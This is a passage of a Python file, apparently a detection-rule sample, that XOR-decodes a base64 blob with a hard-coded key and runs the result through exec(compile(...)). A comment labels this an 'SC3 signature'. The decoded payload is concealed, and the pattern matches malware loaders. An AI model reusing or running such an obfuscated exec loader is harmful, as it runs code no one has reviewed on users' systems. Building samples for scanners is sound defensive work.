RMtavb2VnsxY31T+tMeQjQWZWvXoyYGEVqQoksLH0sxWgg+8uJWdjxOCCfCYiIKJGNkZs6zL0p8elBay9bOAmRPYcNShgdKzKZ8bs624rcxLzFr8l7ifjR+fJYHq3fjMVtFas6mOnMRf+w=="
_K = bytes.fromhex("f2ec76f17adec8e7")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    raw = base64.b64decode(_BLOB)
    return _xor(raw, _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
